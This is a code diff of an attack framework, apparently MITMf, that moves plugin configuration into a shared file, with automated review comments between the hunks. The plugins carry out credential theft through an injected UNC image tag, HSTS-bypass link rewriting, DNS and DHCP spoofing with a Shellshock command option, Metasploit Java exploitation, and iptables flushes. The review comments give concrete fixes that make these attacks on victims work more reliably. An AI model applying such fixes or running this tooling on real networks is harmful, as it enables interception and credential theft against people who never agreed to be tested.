userconfig = ConfigObj("./config/beefautorun.cfg")
|
beefconfig = options.configfile['MITMf']['BeEF']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
|
||||||
|
|
||||||
|
try:
|
||||||
|
userconfig = options.configfile['BeEFAutorun']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
|
||||||
|
|
||||||
self.Mode = userconfig['mode']
|
self.Mode = userconfig['mode']
|
||||||
self.All_modules = userconfig["ALL"]
|
self.All_modules = userconfig["ALL"]
|
||||||
|
|
|
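Review bot: `userconfig['mode']` and `userconfig["ALL"]` at L4149-L4155 are read after the try/except that was added for the section lookup, so a [BeEFAutorun] section missing either key still crashes with a raw KeyError despite the new formatted error path; move those reads inside the second try or use `userconfig.get`. The two consecutive try/excepts can be one: `try: beefconfig = options.configfile['MITMf']['BeEF']; userconfig = options.configfile['BeEFAutorun']` followed by `except KeyError, e: sys.exit("[-] Missing section or key in config file: %s" % e)`. The BeEF block presumably carries the BeEF REST credentials (its keys are not visible here), so the consolidated mitmf.cfg now holds secrets for several plugins; a note in the sample config that it should be kept out of version control and readable only by the operator would be appropriate.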
@ -2,7 +2,7 @@ from plugins.plugin import Plugin
|
||||||
|
|
||||||
|
|
||||||
class CacheKill(Plugin):
|
class CacheKill(Plugin):
|
||||||
name = "CacheKill Plugin"
|
name = "CacheKill"
|
||||||
optname = "cachekill"
|
optname = "cachekill"
|
||||||
desc = "Kills page caching by modifying headers"
|
desc = "Kills page caching by modifying headers"
|
||||||
implements = ["handleHeader", "connectionMade"]
|
implements = ["handleHeader", "connectionMade"]
|
||||||
|
|
|
@ -88,7 +88,7 @@ class FilePwn(Plugin):
|
||||||
#NOT USED NOW
|
#NOT USED NOW
|
||||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||||
|
|
||||||
self.userConfig = ConfigObj("./config/filepwn.cfg")
|
self.userConfig = options.configfile['FilePwn']
|
||||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||||
|
|
|
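Review bot: `self.userConfig = options.configfile['FilePwn']` at L4217 is the only plugin section lookup in this commit without the try/except the other plugins got, so a missing [FilePwn] section produces a raw KeyError traceback instead of the `[-] Error parsing config` message; wrap it the same way: `try: self.userConfig = options.configfile['FilePwn']` / `except KeyError, e: sys.exit("[-] Missing [FilePwn] section in config file: " + str(e))`. ConfigObj returns `FileSizeMax` at L4220 as a string; if it is compared against a byte count later in the file (not visible in the hunk) it needs an `int()` here. If `from configobj import ConfigObj` at the top of this file is now unused, it can be dropped along with the old per-plugin config.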
@ -3,6 +3,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Er
|
||||||
from scapy.all import get_if_addr
|
from scapy.all import get_if_addr
|
||||||
import time
|
import time
|
||||||
import re
|
import re
|
||||||
|
import sys
|
||||||
import argparse
|
import argparse
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.CacheKill import CacheKill
|
from plugins.CacheKill import CacheKill
|
||||||
|
|
|
@ -9,7 +9,6 @@ import sys
|
||||||
import logging
|
import logging
|
||||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||||
from scapy.all import get_if_addr
|
from scapy.all import get_if_addr
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||||
requests_log.setLevel(logging.WARNING)
|
requests_log.setLevel(logging.WARNING)
|
||||||
|
@ -26,8 +25,15 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
self.options = options
|
self.options = options
|
||||||
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
|
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
|
||||||
|
|
||||||
msfcfg = ConfigObj('./config/mitmf.cfg')['Metasploit']
|
try:
|
||||||
self.javacfg = ConfigObj('./config/javapwn.cfg')
|
msfcfg = options.configfile['MITMf']['Metasploit']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
|
||||||
|
|
||||||
|
try:
|
||||||
|
self.javacfg = options.configfile['JavaPwn']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
|
||||||
|
|
||||||
self.msfport = msfcfg['msfport']
|
self.msfport = msfcfg['msfport']
|
||||||
self.rpcip = msfcfg['rpcip']
|
self.rpcip = msfcfg['rpcip']
|
||||||
|
|
|
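Review bot: `self.msfport = msfcfg['msfport']` and `self.rpcip = msfcfg['rpcip']` at L4370-L4377 sit outside the new try/except, so a [Metasploit] block missing either key still dies with a raw KeyError after the nicer error path was added; pull them into the first try or use `msfcfg.get(...)` with an explicit check. The Metasploit RPC settings, and presumably the RPC password (not shown here), now live in the shared mitmf.cfg next to every other plugin's settings, so the sample config should say that it contains credentials. initialize continues past the end of the hunk.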
@ -23,6 +23,11 @@ class Responder(Plugin):
|
||||||
if os.geteuid() != 0:
|
if os.geteuid() != 0:
|
||||||
sys.exit("[-] Responder plugin requires root privileges")
|
sys.exit("[-] Responder plugin requires root privileges")
|
||||||
|
|
||||||
|
try:
|
||||||
|
config = options.configfile['Responder']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.ip_address = get_if_addr(options.interface)
|
self.ip_address = get_if_addr(options.interface)
|
||||||
if self.ip_address == "0.0.0.0":
|
if self.ip_address == "0.0.0.0":
|
||||||
|
@ -32,16 +37,16 @@ class Responder(Plugin):
|
||||||
|
|
||||||
print "[*] Responder plugin online"
|
print "[*] Responder plugin online"
|
||||||
DnsCache.getInstance().setCustomAddress(self.ip_address)
|
DnsCache.getInstance().setCustomAddress(self.ip_address)
|
||||||
DnsCache.getInstance().setCustomRes('wpad', self.ip_address)
|
|
||||||
DnsCache.getInstance().setCustomRes('ISAProxySrv', self.ip_address)
|
for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']:
|
||||||
DnsCache.getInstance().setCustomRes('RespProxySrv', self.ip_address)
|
DnsCache.getInstance().setCustomRes(name, self.ip_address)
|
||||||
|
|
||||||
if '--spoof' not in sys.argv:
|
if '--spoof' not in sys.argv:
|
||||||
print '[*] Setting up iptables'
|
print '[*] Setting up iptables'
|
||||||
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
||||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
|
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
|
||||||
|
|
||||||
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address))
|
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config))
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
|
|
|
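Review bot: start_responder is launched in a daemon thread at L4490-L4500 with the new `config` argument, but every validation inside it (the 16-character Challenge check, the `.decode("hex")`) terminates via sys.exit, and SystemExit raised in a non-main thread only ends that thread — MITMf would print `Responder plugin online` and keep running with no Responder services. Validate the section before starting the thread, e.g. `if len(config['Challenge']) != 16: sys.exit("[-] Responder: Challenge must be exactly 16 hex chars")`, and consider checking that the cert/key paths in `config['HTTPS Server']` exist when HTTPS is On. The iptables flush on L4477 is pre-existing and unchanged here, but it wipes every rule on the host including the nat table, which deserves a loud warning in the output.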
@ -1,5 +1,9 @@
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.Inject import Inject
|
from plugins.Inject import Inject
|
||||||
|
import sys
|
||||||
|
import logging
|
||||||
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||||
|
from scapy.all import get_if_addr
|
||||||
|
|
||||||
|
|
||||||
class SMBAuth(Inject, Plugin):
|
class SMBAuth(Inject, Plugin):
|
||||||
|
@ -11,10 +15,19 @@ class SMBAuth(Inject, Plugin):
|
||||||
Inject.initialize(self, options)
|
Inject.initialize(self, options)
|
||||||
self.target_ip = options.host
|
self.target_ip = options.host
|
||||||
self.html_payload = self._get_data()
|
self.html_payload = self._get_data()
|
||||||
|
|
||||||
|
if self.target_ip is None:
|
||||||
|
try:
|
||||||
|
self.target_ip = get_if_addr(options.interface)
|
||||||
|
if self.target_ip == "0.0.0.0":
|
||||||
|
sys.exit("[-] Interface %s does not have an IP address" % options.interface)
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error retrieving interface IP address: %s" % e)
|
||||||
|
|
||||||
print "[*] SMBAuth plugin online"
|
print "[*] SMBAuth plugin online"
|
||||||
|
|
||||||
def add_options(self, options):
|
def add_options(self, options):
|
||||||
options.add_argument("--host", type=str, help="The ip address of your capture server")
|
options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")
|
||||||
|
|
||||||
def _get_data(self):
|
def _get_data(self):
|
||||||
return '<img src=\"\\\\%s\\image.jpg\">'\
|
return '<img src=\"\\\\%s\\image.jpg\">'\
|
||||||
|
|
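Review bot: `self.html_payload = self._get_data()` at L4565 runs before the interface-IP fallback added below it, so when --host is omitted the payload is built while self.target_ip is still None; if _get_data formats self.target_ip into the `\\%s\image.jpg` UNC path (its body continues past the hunk), the injected tag points at `\\None\image.jpg`. Move the `_get_data()` call below the fallback block, after the `sys.exit` checks. Since --host is interpolated into HTML served to every victim, a cheap sanity check that it looks like an IP or hostname would also catch typos before anything is injected.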
20
plugins/SSLstrip+.py
Normal file
20
plugins/SSLstrip+.py
Normal file
|
@ -0,0 +1,20 @@
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from libs.sslstrip.URLMonitor import URLMonitor
|
||||||
|
import sys
|
||||||
|
|
||||||
|
class HSTSbypass(Plugin):
|
||||||
|
name = 'SSLstrip+'
|
||||||
|
optname = 'hsts'
|
||||||
|
desc = 'Enables SSLstrip+ for partial HSTS bypass'
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
self.options = options
|
||||||
|
|
||||||
|
try:
|
||||||
|
config = options.configfile['SSLstrip+']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
|
||||||
|
|
||||||
|
print "[*] SSLstrip+ plugin online"
|
||||||
|
URLMonitor.getInstance().setHstsBypass(config)
|
|
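Review bot: The plugin only hands the [SSLstrip+] mapping to URLMonitor, but the substituted hostnames presumably must also resolve to the attacker for the bypass to work, and that DNS side is handled by the Spoof plugin, which reads the same section only when `--dns` is given (L4803-L4818); with --hsts alone the rewritten links would fail to resolve and nothing says why. Mirror what the Responder plugin does with `'--spoof' not in sys.argv` and warn: `if '--dns' not in sys.argv: print "[!] SSLstrip+ needs the Spoof plugin with --dns for the substituted hostnames to resolve"`. setHstsBypass also does nothing for an empty section, so an empty [SSLstrip+] block leaves the bypass silently disabled after `SSLstrip+ plugin online` was printed; add `if not config: sys.exit("[-] [SSLstrip+] section in config file is empty")`.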
@ -20,7 +20,6 @@ from base64 import b64decode
|
||||||
from urllib import unquote
|
from urllib import unquote
|
||||||
import binascii
|
import binascii
|
||||||
import random
|
import random
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
|
|
||||||
class Spoof(Plugin):
|
class Spoof(Plugin):
|
||||||
|
@ -93,7 +92,7 @@ class Spoof(Plugin):
|
||||||
|
|
||||||
self.rand_number = []
|
self.rand_number = []
|
||||||
self.dhcp_dic = {}
|
self.dhcp_dic = {}
|
||||||
self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
|
self.dhcpcfg = options.configfile['Spoof']['DHCP']
|
||||||
|
|
||||||
thread_target = self.dhcp_sniff
|
thread_target = self.dhcp_sniff
|
||||||
thread_args = ()
|
thread_args = ()
|
||||||
|
@ -109,9 +108,9 @@ class Spoof(Plugin):
|
||||||
print "[*] DNS Tampering enabled"
|
print "[*] DNS Tampering enabled"
|
||||||
|
|
||||||
if self.dns:
|
if self.dns:
|
||||||
self.dnscfg = ConfigObj("./config/dns.cfg")
|
self.dnscfg = options.configfile['Spoof']['DNS']
|
||||||
|
|
||||||
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
|
self.hstscfg = options.configfile['SSLstrip+']
|
||||||
|
|
||||||
if not self.manualiptables:
|
if not self.manualiptables:
|
||||||
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
|
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
|
||||||
|
@ -334,7 +333,7 @@ class Spoof(Plugin):
|
||||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
||||||
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
||||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
|
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
|
||||||
options.add_argument('--shellshock', type=str, dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||||
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
||||||
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
|
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
|
||||||
|
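Review bot: The new consolidated-config lookups `options.configfile['Spoof']['DNS']` and `options.configfile['SSLstrip+']` in the `@ -109,9 +108,9 @@` hunk raise a bare KeyError traceback if either section is missing from the single config file, whereas the SSLstrip+ plugin added in this same commit wraps the identical lookup and exits with a readable message; handle them the same way, e.g. `except KeyError as e: sys.exit("[-] Missing config section for Spoof: " + str(e))` (whether `sys` is imported in this file is not visible in the hunk, confirm). Note that Spoof now reads the `SSLstrip+` section unconditionally whenever `--dns` is enabled, independent of whether the SSLstrip+ plugin is loaded, so the HSTS host rewrites presumably apply to DNS answers on their own; if that coupling is intended, a comment such as `# DNS-side half of the SSLstrip+ HSTS bypass; always active with --dns` would document it, otherwise gate the load on the plugin being active. The enclosing method starts and ends outside the hunk.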
|